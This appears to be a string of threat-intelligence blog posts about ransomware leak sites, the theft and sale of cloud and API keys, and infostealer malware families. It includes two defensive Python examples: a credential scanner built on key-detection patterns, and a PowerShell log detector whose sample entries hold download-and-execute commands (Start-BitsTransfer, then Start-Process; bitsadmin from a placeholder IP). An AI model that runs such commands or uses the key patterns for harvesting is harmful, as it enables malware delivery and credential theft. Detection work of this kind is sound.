Sarah Prime, Director of Product Technology, continues to innovate new products that illuminate critical areas of the darknet. We spoke with Sarah to get the latest on DarkOwl’s new product, Ransomware API.
So Sarah, tell us about this product
Our new product is called Ransomware API, which is an endpoint designed to allow organizations to monitor and have insight into ransomware sites on the darknet.
What made you want to develop this endpoint?
We developed it as a direct response to what we were hearing from our customers. We know that our insight and historical perspective into the darknet is unique, and we wanted to make it easy for people to find this critical information about their vendors or clients.
With this API product, content on these sites – including organization mentions – can now serve as an important risk indicator for a variety of use cases.
Tell me more about these ransomware group sites
The sites available via our new Ransomware API are darknet sites where these groups will publish public announcements, as well as links to downloadable content – often in the form of stolen data. We retain all of the ransomware site content in our archive, as part of our darknet data collection, even after it’s taken down.
As we all know, ransomware as a criminal activity has really skyrocketed in the past few years. Ransomware groups have become significantly more sophisticated and organized from a business perspective, and have created their own underground economy. They commonly use advanced economic strategies such as affiliate networks, third party mediation consultants, and referral programs.
Part of the way groups bolster their clout and status as a reliable enterprise is by establishing a brand, which means they will launch a website just like a corporation might on the regular internet. They even gain income via ad revenue like any other website. Except, this is taking place in a criminal setting.
What would a company being mentioned on one of these sites mean?
It depends, but the vast majority of the time it would mean that the company has been successfully compromised as the result of a ransomware attack. There are certain exceptions, such as when a company has been targeted and the ransomware group posted a description of that company and it included a partner organization, for example. However, in that scenario, it would be important for that company to know that its partner had suffered a ransomware attack so that it could deploy appropriate cautionary and defensive measures within its own network.
After it has been targeted and compromised as the result of a ransomware attack, the context in which a company is mentioned can vary from case to case. In some circumstances, a RaaS group may publish a post stating that they have compromised company X, and if that company doesn’t pay up, they will publish all of their data on their website for free to whomever wants to download it. In other cases, they will sell off portions of a company’s data for profit, regardless of whether they had paid their ransom or not.
Image A: Screen capture of a ransomware group posting on the darknet that describes the data obtained from one of their victims
Image B: Screen capture of the same ransomware posting as Image A, as indexed within DarkOwl’s database and seen in Vision UI
If the attack has already happened, why does it matter?
It’s critical to know whether your customers or companies in your supply chain have been subjected to a ransomware attack. If one of your third-party vendors is compromised by a ransomware attack, you don’t want to wait until they’re able to officially inform you to find out – especially considering that their networks may still be inaccessible to them. They may not even be able to effectively inform their partners/clients right away. Similarly, a services provider can monitor their customer base for these attacks, both to assist in their reaction and also to be aware of the risk associated with the attack. Insurance underwriters and reinsurance companies have a need to monitor on an ongoing basis.
In cases where a company has not backed up their data, the records publicized by the criminals can be a means of understanding exactly what data was lost, what is being sold, and what missing records the group may be holding on to.
Who are the most prolific ransomware actors?
The LockBit 2.0 (LB2) ransomware group has the highest number of victims since the start of 2022. In our analysis of ransomware activity since the invasion of Ukraine in early May, we determined LB2 had successfully encrypted over 280 victims, averaging 4.5 victims per day.
CL0P and CONTI were the two next groups with the highest number of victims, but according to open source reporting, CONTI may be in the process of shutting down their operations due to the impact of Russian sanctions, or simply rebranding to lessen public pressure on the group. We’ve also witnessed AlphaV and HiveLeak demonstrate exponential growth in victim announcements in recent weeks.
How does DarkOwl track these groups?
What’s interesting is that ransomware is a uniquely darknet-based phenomenon. By that I mean, its origins are on the darknet, its perpetrators primarily reside on the darknet, and its economy is hosted on the darknet. We are also increasingly seeing RaaS groups opening splinter or parallel operations on darknet-adjacent networks, such as on chat platforms like Telegram.
We’ve been in the darknet space for a long enough time that our analysts have naturally been keeping tabs and in some cases gotten quite close to these networks, so that we’ve been able to maintain access. We’re also deeply familiar with the way in which these groups operate and are able to predict when new groups are gaining prominence, when popular groups are rebranding, when they might be launching new sites, and so forth.
Is there a particular use case that you think Ransomware API is a good fit for?
Any company that has a substantial vendor portfolio and is concerned about supply chain risk. It could also provide an important datapoint for cyber insurance underwriters who need to assess a company’s historical risk. In fact, because ransomware groups will often remove or delete their posts after a certain amount of time, this tool is one of the few – if not the only – that can provide an accurate picture of whether or not a company has been the subject of a ransomware attack.
How is this different from our other API products?
This product provides information regarding a very specific use case that customers can use to build whatever they want, including monitoring functionality, auditing services, underwriting assessments, compliance tools, etc. While this is also possible with our other APIs, the targeted scope of this data makes it one of our more streamlined and scalable products.
What else makes this product special?
This product is built on dynamic data sources; as ransomware groups evolve, so does our data coverage. We can also track specialty groups upon request, so it will be interesting to see what kind of growth there is in coming months as we continually add new ransomware sites to our collection.
Anything to look forward to from DarkOwl team? What is the product team excited about?
Yes! We always have a lot going on, but the biggest thing on the horizon from the product team is the development of a new DARKINT scoring model. It’s showing a lot of early promise in identifying heightened risk, making it an even more comprehensive measure of an organization’s darknet exposure. This is critical for risk assessment, risk monitoring and rating efforts.
Where can people learn more?
To stay aware of ransomware group activity, I recommend keeping up with the research that our analysts publish regularly. Their latest piece, which is fascinating coverage of RaaS group activity since the invasion of Ukraine, can be found here.
To learn more about Ransomware API, please reach out to schedule a demo with our sales and product teams.
In this blog, we review how sensitive, server-side access credential data – such as AWS private/secret keys, Django secret keys, and API tokens – are captured, circulated, and sold across darknet marketplaces and criminal communities.
Darknet Background
The darknet, which is also referred to as the dark web, is a segment of the internet that is only accessible by using specialized software or network proxies. Due to the inherently anonymous and privacy-centric nature of the darknet, it facilitates a complex ecosystem of cybercrime and illicit goods and services trade. Adjacent to the darknet are the deep web and instant chat platforms, which play an increasingly critical role in making this illicit information available. Pseudo-anonymous discussion forums and vendor marketplaces hosted on the deep web, along with Telegram private and public channels, provide additional platforms by which threat actors communicate and circulate sensitive and stolen credential data.
There are multiple types of underground criminal communities that are directly involved in the circulation of stolen credential data. The threat actors from these communities are often categorized as:
Initial Access Brokers: specialize in providing direct access to organizational networks to conduct offensive cyber campaigns. Access is offered for sale on darknet malware discussion forums and exploit marketplaces.
Database Brokers: specialize in exfiltration of large datasets from compromised organizations. Databases are traded and sold on darknet marketplaces and Telegram channels.
Nation-State Sponsored / Cyber Criminal Gangs: these groups are intent on conducting cyber operational campaigns in fulfillment of geopolitical or military initiatives, cyber espionage, and/or information operations. Some gangs are also financially motivated and will extort the victim for financial payments once keys have been leveraged for access and theft of sensitive data.
There is also the odd and less publicized ‘hacker skid’ or hobbyist hackers that will scour the darkest corners of the Internet for server-side credential data for simply the psychological thrill of the hunt. These threat actors do not have direct intent for monetary gain, nor even probable use, but seek to feed their egos and increase their personal clout by stealing keys and communicating their various levels of illegal access to high-profile criminal groups and hacking enthusiast communities and chat servers.
Critical Credential Data
This blog is focused on server-side credential data for development and cloud-based server assets. The term credential data can also refer to username/email-address and password combinations; those are not discussed here.
There are several types of “keys” that threat actors are interested in obtaining:
Amazon Web Service (AWS) Key Management Service (AWS KMS) Access Keys: ‘poweruser’ and administrator encryption keys for managing Amazon-hosted services.
AWS Identity Access Management (IAM) keys: consist of long-term credentials users will use to sign programmatic requests to AWS Command Line Interface (CLI) or AWS API.
Azure Keys & Secrets: Credential data stored inside Azure Key Vault (KV). Data includes database connection strings, account keys, passwords, and JSON Web keys.
Django SECRET_KEYs: secret key for a particular Django installation that is used to provide cryptographic signing.
Google Key Management System (KMS) Customer Managed Encryption Keys (CMEK): project IDs and private keys for service accounts on the Google Cloud Platform (GCP).
API Keys: keys required for any number of application programming interfaces.
Unfortunately, the threat actors do not always delineate types of keys they’ve obtained or are offering. Many times the threat actor simply advertises the platform and the word “key” in the forum post or marketplace advertisement.
Key Compromise
Commercial application developers have been guilty of copying and pasting keys into organizational Github repositories that are publicly accessible and easily harvested by automated web scrapers. Malicious threat actors actively hunt for such keys across software repositories and unprotected s3 buckets and then utilize the keys for malicious campaigns or trade them on the darknet. Sometimes such exfiltrated data is stored on transient paste sites prior to distribution, where it is captured by DarkOwl.
A recent example of a ‘dump’ of secret server keys is demonstrated in the figure below. These were discovered by simply using DarkOwl’s proximity search to find documents where the words ‘AWS’ and ‘key’ are within two words of each other.
Figure 1: Source DarkOwl Vision
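A defensive counterpart to the harvesting described above is to scan your own repositories and pastes for the same key shapes before an attacker does. The following is an added example (not DarkOwl’s code or product): a small scanner for the key types this post lists, using a Shannon-entropy threshold so that placeholder values are not reported. The sample settings file is constructed; the AWS values in it are Amazon’s published documentation examples, and the token value is made up.

```python
import math
import re
from collections import Counter
from dataclasses import dataclass
from typing import List

# Detection patterns for the key types named in this post. The AWS access key
# ID format (AKIA/ASIA prefix + 16 upper-case alphanumerics) is publicly
# documented; the other patterns match the usual assignment shapes in config
# files. Each entry is (regex, minimum entropy of the captured value): a
# structured key ID is reported on format alone, while free-form secrets must
# also look random so that placeholders such as "change-me" are skipped.
PATTERNS = {
    "aws_access_key_id": (re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b"), 0.0),
    "aws_secret_access_key": (
        re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})"), 3.5),
    "django_secret_key": (re.compile(r"SECRET_KEY\s*=\s*['\"]([^'\"]{20,})['\"]"), 3.5),
    "generic_api_key": (
        re.compile(r"(?i)(?:api[_-]?key|token)\s*[=:]\s*['\"]?([A-Za-z0-9_\-]{24,})"), 3.5),
}

# Constructed sample: a leaked Django settings file. The AWS values are the
# public AWS documentation examples; the webhook token is invented.
SAMPLE = """\
# settings.py (constructed sample; AWS values are the public documentation examples)
SECRET_KEY = 'change-me-change-me-change-me'
AWS_ACCESS_KEY_ID = 'AKIAIOSFODNN7EXAMPLE'
AWS_SECRET_ACCESS_KEY = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY'
STRIPE_API_KEY = "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
WEBHOOK_TOKEN = "tok_9fK2mQ7xL4pZ8vR1wB3nY6cH0dJ5"
"""


@dataclass
class Finding:
    kind: str
    line_no: int
    preview: str   # first four characters only; never log the full secret
    entropy: float


def shannon_entropy(value: str) -> float:
    """Bits of entropy per character; 0.0 for an empty or single-symbol string."""
    if not value:
        return 0.0
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())


def scan_text(text: str) -> List[Finding]:
    """Scan text line by line and return findings that pass the per-kind entropy bar."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for kind, (pattern, min_entropy) in PATTERNS.items():
            for match in pattern.finditer(line):
                value = match.group(1) if match.groups() else match.group(0)
                entropy = shannon_entropy(value)
                if entropy < min_entropy:
                    continue   # placeholder such as "xxxx..." or "change-me"
                findings.append(Finding(kind, line_no, value[:4] + "****", entropy))
    return findings


def scan_file(path: str) -> List[Finding]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_text(fh.read())


if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f"line {f.line_no}: {f.kind} {f.preview} (entropy {f.entropy:.2f})")
```

Running the block on the sample reports the AWS key pair and the webhook token and stays silent on the two placeholder values.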
Some threat actors offer zero-days on malware-centric Telegram channels and darknet discussion forums that facilitate the scanning of Gitlab and Github. In early 2021, a user on AIO Crime, using the moniker soapceo, offered a 0day for searching private repositories for AWS keys for $10K USD.
Figure 2: Source DarkOwl Vision
Other malicious actors employ malware, such as information stealers (a.k.a. infostealers) to steal session tokens and keys. Infostealers such as Redline, Jester, and Eternity – often installed onto victim devices via malicious email campaigns – covertly log and exfiltrate sensitive data from the victim’s device to cause additional harm.
According to open sources, information security researchers have identified similar information stealer malware in the wild, such as TeamTNT_AWS_Stealer, which specifically targets virtual/cloud platforms to exfiltrate sensitive AWS keys on Kubernetes and Docker clusters adjacent to the compromised container.
DarkOwl identified malware called Laravel Monster that is advertised as an “all-in-one grabber” that exfiltrates AWS keys “and more” offered on a popular Russian-speaking forum. The malware also includes a built-in AWS checker that validates whether the keys harvested are active and live and could be used to compromise the server.
Figure 3: Source DarkOwl Vision
For reference, in early 2022, we observed another example, a “Git Scanner” malware offered on the exploit forum for $4K USD to $8K USD depending on the features of the software. A YouTube video demonstrating the software is also included in the post.
In April 2022, a user posted an offer on Telegram for something called “INJECTOR V3” and a hacking guide known as “Amazon AWS SMTP Method 2022.”
It’s unclear what the details of this method entail (as we did not purchase it); however, other chatter on Telegram suggests it “cracks” AWS servers, uses the server to carry out malspam email campaigns, e.g. phishing, and may even harvest data while on the server.
Figure 4: Source DarkOwl Vision
Keys on Offer
DarkOwl has observed sensitive credential data and keys on offer across the darknet and adjacent chat platforms known for facilitating cyber-crime. Darknet and deep web forums popular for discussing critical credential data, e.g. keys, include many of the malware-specific forums such as XSS. Many times the mention is in relation to “how to exploit” what they’ve discovered on the compromised cloud asset, while other keys are offered “for sale” in the ACCESS section of the marketplace embedded in the forum.
Darknet threat actors utilize Jabber XMPP and Telegram services in conjunction with their accounts on malware discussion forums to communicate directly with their customers and/or provide more detail about their use of malware they’ve developed or are on offer.
Some threat actors have dedicated “public” Telegram channels where services and digital goods are offered for sale. DarkOwl has observed keys for sale on darknet forum threads and Telegram channels. Many offers on Telegram include offers for keys to simply increase their credibility in the space and encourage customers to do business with them.
Figure 5: Source DarkOwl Vision
While many keys are captured via the methods mentioned above, sensitive SDK API keys are often stolen during organizational cybersecurity incidents, and then circulated by groups on the darknet and in Telegram channels. In summer of 2021, Electronic Arts’ (EA) FIFA software servers were compromised by a cybercriminal gang, and the data is still in circulation.
Figure 6: Source DarkOwl Vision
Sometimes a discovered or stolen key is utilized to access a cloud or platform panel and the threat actor offers the ‘panel’ for sale. In late 2021, a Telegram market, known as “The Grand Exchange” advertised an Azure panel on offer for sale. The advertisement references a deep web marketplace for the vendor.
Figure 7: Source DarkOwl Vision
Many API keys in circulation on the darknet are offered for free. DarkOwl has observed several recent software API keys offered for free on popular commercial-accounts-trading Telegram channels.
In 2020, a Telegram channel user stated they had a Binance API key they obtained via information stealer malware.
In March 2021, an initial access broker advertised sensitive credential data and cloud access AWS “root” keys for a USA company on a popular darknet malware development forum. The keys were on sale for $80K USD and the threat actor included the revenue estimates for the company and AWS bills to justify the cost of the keys in correlation to the potential ransomware extortion values.
Figure 8: Source DarkOwl Vision
DarkOwl has observed API keys for sale on darknet discussion forums and adjacent Telegram live chat platforms. Both Raidforums and its newest reincarnation, Breached Forums, have included such offers on their sites. The figure below is an example of a Raidforums user on Telegram offering to sell a Coinbase Pro API key for malicious access. How the API key was obtained is unclear.
Figure 9: Source DarkOwl Vision
DarkOwl has observed threat actors offering to sell access to “logs” on darknet marketplaces, such as Russian and Genesis. Such logs are obtained via stealer malware variants and include session tokens and keys obtained from victim devices.
Databases of stealer logs that may include API tokens and sessions are also offered for sale and trade on deep web forums such as Breached Forums.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use case.
Overview: Information Stealers (or ‘infostealers’)
In recent months, DarkOwl has observed an increase in the number of posts by the underground cybercriminal community advertising a specific type of malware known as “information stealers” or simply ‘infostealers’. Most of the infostealer promotion appears on darknet and deep web malware/hacking forums, and the stealers are available for sale across many darknet marketplaces.
Information stealers are designed to steal sensitive information from a compromised device. Most information stealers are designed to covertly access the application where data is stored, e.g. an internet browser, and gather personal information such as authentication and credential data, crypto wallets, browser session cookies, etc., and remotely transmit the data back to the cybercriminal for conducting additional financially-focused extortion crime.
Infostealers are commonly delivered by social engineering, such as malspam campaigns and phishing emails. Attachments are typically included in the email with a lure, or a legitimate-looking trap encouraging victims to open the attachment and install the malware onto their device. Information stealers are on the rise and promise lucrative business opportunities for cyber criminals.
In this research, our team reviewed some of the most widely proliferated infostealers on offer on the darknet and discovered an elaborate data exfiltration ecosystem, with a low entry cost, providing cybercriminals access to a wealth of personal information without the victim’s knowledge. We also learned many infostealers are offered under a malware-as-a-service (MaaS) or “stealer-as-a-service” (SaaS) rental model with subscription-based access to the malware executables and associated command and control (C2) botnets.
Redline
Redline is one of the most popular, widely recommended, and notorious information stealers available on the market. The first advertisement for Redline appeared in March 2020. Redline can be used for exfiltrating credentials, cryptocurrency wallets, browser information, as well as FTP client application data. The stealer also collects information about the victim device, including OS, system hardware, processes, and system language.
According to OSINT security researchers, the stealer can load remote payloads, in addition to using the SOAP protocol for covert C2 communication. Recent versions of Redline leverage SOAP, or Simple Object Access Protocol, over NET.TCP, which helps obfuscate the communication data shared between the victim and the C2 servers. SOAP also facilitates smaller packet sizes, which translates to a smaller malware footprint.
Redline is available on darknet marketplaces like DarkFox for as little as $150 USD for the “lite” version, $200 USD for an advertised “pro” version, or $100 USD for a monthly subscription with restricted access. Other marketplace offers indicate that the Redline team advertises various versions and configurations of their infostealer to support varying levels of threat actor sophistication.
The malware is written in C# and uses a SOAP API to communicate with its C2. Attackers are contacted on Telegram and then can use the C2 panel installed on the victims’ device to use Redline. Redline source code is available on Github with 142 lines of code and built-in commands. (Source: Available Upon Request)
Figure 1: Offer for Redline Stealer for sale on Darkfox Darknet Marketplace
Raccoon
According to open sources, Raccoon Stealer, a.k.a Racelar, was first offered for sale in April 2019 and associated with a Telegram user @gr33nl1ght. The Raccoon stealer exfiltrates victim login credentials, credit card information, cryptocurrency wallets and browser information. It can also download and execute arbitrary files by command from the C2, operated from Telegram.
DarkOwl has observed advertisements in the darknet for Raccoon offered under the malware-as-a-service model for $75 USD a week or $200 USD per month. Some advertisements on Telegram decrease with longer commitment, e.g. $500 for two months and $499 for four months. The Raccoon stealer executables are available on Github and the source code has been archived in Pastebin.
Despite the success of their operations, in March, the Raccoon stealer group announced on a darknet forum they would be suspending operations due to the war in Ukraine and critical team members who are no longer available for key operations.
Figure 2: Raccoonstealer Representative Announcement of Shutdown due to Ukraine-Russia War
Vidar
According to analysts with Cyble, Vidar, also sold as Vidar PRO stealer, was first identified back in 2018. This infostealer variant steals sensitive information such as passwords, banking information, IP addresses, browser history, login credentials and crypto wallets which are sent back to threat actors’ command and control.
The stealer is widely advertised on Telegram and a DarkOwl Vision document captures a Vidar offer on Telegram for $500 USD, but prices on average range from $250 USD to $750 USD for the stealer malware. (Source: DarkOwl Vision)
Vidar is written in C++, and employs Mastodon servers for command and control. An interesting and in-depth analysis of the stealer code can be found on Github, detailing how its stealer infrastructure operates. (Source Redacted but Available Upon Request)
Predator the Thief
Predator the Thief was first offered for sale on a Russian Darknet Forum on June 17, 2018 by a user known as Alexuiop1337. Predator the Thief is more comprehensive than a browser stealer alone and is able to take screenshots of the victim’s desktop in addition to typical exfiltration of credentials, payment data, crypto wallet information stored in the victim’s internet browsers. (Source)
The malware also includes anti-debug techniques, advanced evasion, and anti-analysis tricks for additional sophistication. It is still widely circulated and updated regularly. A Github repository containing the infostealer’s 332 lines of code is still maintained by a user with the same alias as the original post from 2018. (Source Redacted, but Available Upon Request)
The listing is currently offered on darknet forums as well as Telegram channels. The stealer sells for $150 USD, with an option of paying $100 more for the Clipper module allowing buyers to customize crypto wallet stealing options.
Mars
Mars stealer is the most recent version of OSKI stealer and was first seen circulating around July 2021 on a Russian darknet forum. (Source)
During our analysis, we also discovered that instructions for building the Mars stealer panel and using the “builder” are available across numerous darknet forums, including how to turn off the exclusion that stops the stealer working in Commonwealth of Independent States (CIS) designated countries. This infostealer is advertised for $160 to $200 USD and is continually under development and improvement, complicating YARA rule creation and AV detection.
In early May, users on a darknet forum began circulating a cracked version of the software for use by the community. Many of the forum users warn against using ‘cracked’ versions of the software as there is higher risk of backdoors. We observed that a prominent MarsTeam account which shared some of the original advertisements for the Mars stealer on one popular darknet forum is banned and tagged as a scammer. The ban brings into question the stealer’s legitimacy.
Figure 3: Original post about the Mars Stealer whose Representative has since been banned
Regardless, a GitHub repository containing code for the Mars Stealer is owned by a developer with an impressive collection of various malicious software and other stealers in their repositories, including Loki and Oski stealer as well as Redline. The current version of Mars stealer is using Google Ads to put cloned OpenOffice sites high on search results.
Blackguard
According to open sources, Blackguard first appeared in Russian forums in January 2020 and was advertised “for testing purposes.” The infostealer spent a year in circulation before it was advertised for commercial use in 2021. Blackguard steals web browser data like extensions, cryptocurrency wallets, email, messengers, and other sensitive device information that can identify the victim.
Blackguard is sold as malware-as-a-service where stolen information is archived into a zip file which is sent back to the C2 server. The source code is developed in .NET and access is available for $200 USD a month or $700 for a lifetime subscription. (Source)
Acquisition of the stealer is generally limited to exchange with the malware’s representatives directly via Telegram and Jabber.
Despite its popularity among cybercriminals and the existence of a cracked version recently in circulation, some dark web forum users are not impressed with this information stealer nor its price tag. Some users recently nominated the Blackguard stealer for the “worst stealer 2020-2022 award” and warn others against using this stealer in real cyber campaigns.
Figure 4: Forum post criticizing Blackguard stealer malware
[Figure Translated]
“The sold software, which is a shame to call a stealer, has already been said a lot. He can officially be nominated for the “Worst Stealer 2020-2022” award. Crack taken from the forum where the initial review was posted. It is worth noting that this crack is given “as is”, without fixing holes in the panel. It is categorically not recommended to use it for combat purposes. There is also information that the stealer was so buggy that it fell with exceptions during the crack tests (for example, when getting the av name installed on the machine). These bugs have been fixed by the reverser!”
In other darknet threads, forum users stated that the Blackguard information stealer is “trash”, replete with errors, and requires too much overhead – in the form of persons to operate, especially for the $700 USD price.
Figure 5: Forum post criticizing Blackguard’s lifetime subscription prices
[FIGURE TRANSLATED]
“AHAHAHAHAHAHAHAHAH, $700 sounds more like a rofl than the real price…” That all in all sounds like a big rofl. The author of this software supports the AUE culture and listens to Nurminsky. And now, comrades, answer me one question: how did we come to this. AUE coder. It is 2022. Is this what we deserve?”
The criticisms caused quite a controversy with the stealer representative on the forum confronting many users directly and suggesting they take it up with the moderators in Arbitration.
Jester
Jester is an information stealer that Cyble first noticed in darknet forums in July 2021. It targets the victim’s browser cookies, credentials, email clients, instant messaging applications, crypto wallets, gaming software, VPN and FTP client application data. (Source)
Advertisements on a darknet forum claim that the stealer-C2 connection is encrypted using the AES-CBC-256 algorithm, with servers located in the Tor network, that all logs will be redirected to the user’s Telegram bot, and that collection occurs in memory instead of on disk to evade detection. Jester is available on RuTor with links to pastebin sites explaining what the stealer does and how much it costs in different languages. The “Builder Jester” malware-as-a-service offering is priced based on length of subscription, with $99 USD per month and two “forever” options, one for $250 USD and another for $999 USD.
Cyble suggested a GitHub account owned by user L1ghtM4n is linked to the Jester malware, but further investigation shows that user is linked to a repository called DynamicStealer. DarkOwl has not been able to confirm if the two malware source codes are affiliated; however, some very recent reporting suggests that Jester might be affiliated with the Eternity malware family.
Users promoting Eternity deny the connection, but flaunt that Eternity offers not only a cookie stealer, but a cryptocurrency malware variant, a cryptocurrency address clipboard “clipper”, a DDoS botnet, Worm and Dropper system, as well as a ransomware variant. A new Eternity stealer Tor service claims they successfully exfiltrate a considerable amount of information from the victim including Signal contacts and password manager data on the device like LastPass.
Figure 6: Eternity stealer promotional information provided by the threat actor
Taurus
Taurus Stealer, also referred to as Taurus Project, is an information stealer that has been observed promoted by the authors of Predator the Thief on Russian chat forums in early April 2020. It can steal VPN, social media, credentials, cookies, autofill forms, popular cryptocurrency wallets, and the history of Chromium and Gecko based browsers. It collects information on installed software and system configuration, sending it back to the attacker to be used for further lateral exploits across the compromised machine.
Like Mars Stealer, the source code will not execute on victims located in the CIS region, suggesting the authors are likely located in the Russian Federation.
A lifetime license to Taurus is available for $100 USD and can be customized for as little as $20 USD extra. One advertisement we observed on Telegram offered a 10% discount on license cost and the first update is available for free.
Both Taurus and Predator the Thief use BitsTransfer in their PowerShell commands; BitsTransfer is short for “Background Intelligent Transfer Service”, part of the Windows operating system, and is a way for programs to ask Windows to download or upload files from a remote HTTP or SMB file server.
Taurus downloads from malicious GitHub repositories, whereas Predator the Thief’s PowerShell works with LNK files after the stealer has sent the log. When BitsTransfer is executed in Taurus, it downloads three separate files from the Taurus Project on Github owned by andrewwilm. Github has since removed the repository.
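The BITS download behaviour described above is visible to defenders in PowerShell script-block logging. The following is an added detection example (not DarkOwl’s code and not the stealers’ code): it scores each script block that invokes a BITS transfer, weighting remote HTTP sources, code-hosting origins and user-writable staging paths, and correlates a later reference to the downloaded file by the same user. The log lines are constructed in a simplified event 4104 layout; the repository path and IP address are placeholders.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import urlparse

# Constructed PowerShell script-block log lines, simplified to
# "<timestamp> <event_id> <user> <script text>". Not real telemetry: the
# repository path and the 203.0.113.x address are documentation placeholders.
SAMPLE_EVENTS = """\
2022-06-01T09:12:04Z 4104 CORP\\jdoe Get-ChildItem C:\\Users\\jdoe\\Documents
2022-06-01T09:13:17Z 4104 CORP\\jdoe Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/example-org/example-repo/main/stage2.bin -Destination $env:TEMP\\svc.exe
2022-06-01T09:13:18Z 4104 CORP\\jdoe Start-Process -WindowStyle Hidden $env:TEMP\\svc.exe
2022-06-01T10:02:40Z 4104 CORP\\svc_deploy Start-BitsTransfer -Source \\\\fs01\\software\\agent.msi -Destination C:\\ProgramData\\Deploy\\agent.msi
2022-06-01T10:40:00Z 4104 CORP\\jdoe bitsadmin /transfer job /download /priority high http://203.0.113.25/update.bin C:\\Users\\Public\\update.bin
"""

BITS_RE = re.compile(r"(?i)\bStart-BitsTransfer\b|\bbitsadmin(?:\.exe)?\s+/transfer\b")
URL_RE = re.compile(r"(?i)\bhttps?://[^\s\"']+")
DEST_RE = re.compile(r"(?i)-Destination\s+[\"']?([^\s\"']+)")
# User-writable locations commonly used to stage a downloaded payload
STAGING_DIRS = ("$env:temp", "$env:appdata", "$env:localappdata", "\\users\\public", "\\appdata\\")
# Code-hosting sites: the post notes Taurus pulling its components from GitHub
CODE_HOSTS = ("raw.githubusercontent.com", "github.com", "gitlab.com")


@dataclass
class Event:
    ts: str
    user: str
    text: str


@dataclass
class Alert:
    ts: str
    user: str
    dest: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)

    @property
    def severity(self) -> str:
        return "high" if self.score >= 5 else "medium" if self.score >= 3 else "low"


def parse_events(log: str) -> List[Event]:
    events = []
    for line in log.splitlines():
        parts = line.split(" ", 3)
        if len(parts) == 4 and parts[1] == "4104":
            events.append(Event(parts[0], parts[2], parts[3]))
    return events


def score_bits_event(ev: Event) -> Optional[Alert]:
    """Return an Alert if the script block performs a BITS transfer, else None."""
    if not BITS_RE.search(ev.text):
        return None
    # Destination: explicit -Destination for the cmdlet, last token for bitsadmin
    m = DEST_RE.search(ev.text)
    dest = m.group(1) if m else ev.text.split()[-1]
    alert = Alert(ev.ts, ev.user, dest, score=1, reasons=["BITS transfer invoked from PowerShell"])
    urls = URL_RE.findall(ev.text)
    if urls:
        alert.score += 2
        alert.reasons.append("remote HTTP(S) source rather than an internal SMB share")
        host = (urlparse(urls[0]).hostname or "").lower()
        if any(host == h or host.endswith("." + h) for h in CODE_HOSTS):
            alert.score += 2
            alert.reasons.append(f"source hosted on {host}")
    if any(d in dest.lower() for d in STAGING_DIRS):
        alert.score += 1
        alert.reasons.append(f"destination in user-writable staging path: {dest}")
    return alert


def analyze(log: str) -> List[Alert]:
    events = parse_events(log)
    alerts = []
    for i, ev in enumerate(events):
        alert = score_bits_event(ev)
        if alert is None:
            continue
        # A later script block from the same user naming the downloaded path
        # (e.g. Start-Process) indicates a download-then-execute chain
        if any(e.user == ev.user and alert.dest in e.text for e in events[i + 1:]):
            alert.score += 2
            alert.reasons.append("downloaded file referenced by a later script block")
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in analyze(SAMPLE_EVENTS):
        print(f"{a.ts} {a.user} {a.severity.upper()} (score {a.score})")
        for r in a.reasons:
            print("   -", r)
```

On the sample, the GitHub download followed by execution from %TEMP% scores high, the deployment account’s SMB-share transfer scores low, and the bitsadmin fetch from a bare IP to a public folder lands in between.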
In late December, the source for Taurus stealer + its builder, were leaked on a popular darknet forum. Earlier this week, a darknet user offered multiple software iterations of both Predator the Thief and Taurus for $4K USD in Monero cryptocurrency – stating the code was “straight from the author’s hands.” This implies that both Predator the Thief and Taurus stealers were most likely coded originally by the same person.
Figure 7: Offer of source code for sale for Predator the Thief and Taurus stealer software
[Figure Translated]
“The original source code of the two projects.
Predator: 3 versions (2.3.1/3.0.1/3.3.4 ) + clipper model. The panel is not included.
Projects are sold as is, without support and updates. Straight from the author’s hands.
The price for all 4k is $XMR only. We can conduct the transaction through the guarantor of this forum.”
Other Information Stealers
While the stealers mentioned above are the most widely circulated and discussed across the information security community and cybercriminals, we also found other less known stealers that are currently active in the underground.
Ginzo
In late April, we found an “as-is” version of source code for a stealer known as “Ginzo” available to download from a popular third-party anonymous data repository. The Ginzo stealer targets Telegram session data when loaded on a victim’s device, along with Internet browser cookie data, desktop files, cryptocurrency wallet data, and Discord tokens.
Open-source reporting suggests that offering the stealer for free download is a ploy to gain reputation and “get criminals hooked” on using the Ginzo threat actors’ command and control servers.
[TRANSLATION]
“Taken in the vastness of the cart, laid out as is. DLL keys that are thrown with the panel have not been checked.”
Figure 8: Source code for Ginzo stealer offered for download
Grim
Another controversial stealer, called “Grim stealer”, hosts its own deep web vendor shop and market offering the stealer for sale. The site claims a Telegram scammer is causing the controversy on darknet forums by using the malware team’s logo, a classic case of ‘alias hijacking’, to discredit the stealer’s reputation.
Like Eternity, the Grim shop offers their Grim Noid stealer for $110 USD as well as other products such as: a stealer builder for $60 USD, cryptocurrency clipboard “clipper” for $50 USD, a remote access trojan (RAT) for $100 USD, and botnets for the Surface Web and Telegram for $300 USD.
The technical specifications advertised are consistent with other infostealers on the market.
Figure 9: Grim Noid Stealer offered for sale
The market for information stealers is booming on the darknet, with stealer software variants readily available offering high volume data exfiltration, a relatively low-entry cost, and reliable C2 botnet support.
All the stealer families we reviewed advertise a supportive criminal ecosystem, providing cybercriminals steady access to a wealth of digital tokens and personal information that can be abused for subsequent fraud, digital identity theft, and potentially catastrophic critical infrastructure and supply chain attacks.
Curious about something you read? Interested in learning more? Contact us to find out how darknet data applies to your use-case.
On the 24th of February, after months of failed diplomacy, the existing geopolitical landscape of Russia, Ukraine, NATO, the EU, China, and the myriad of complex international relationships drastically changed. Thousands of Russian troops and equipment crossed into Ukraine’s sovereign territory, and missile strikes on critical infrastructure and historical landmarks sent its people deep into bunkers underneath the cities, while others took up arms to defend their country.
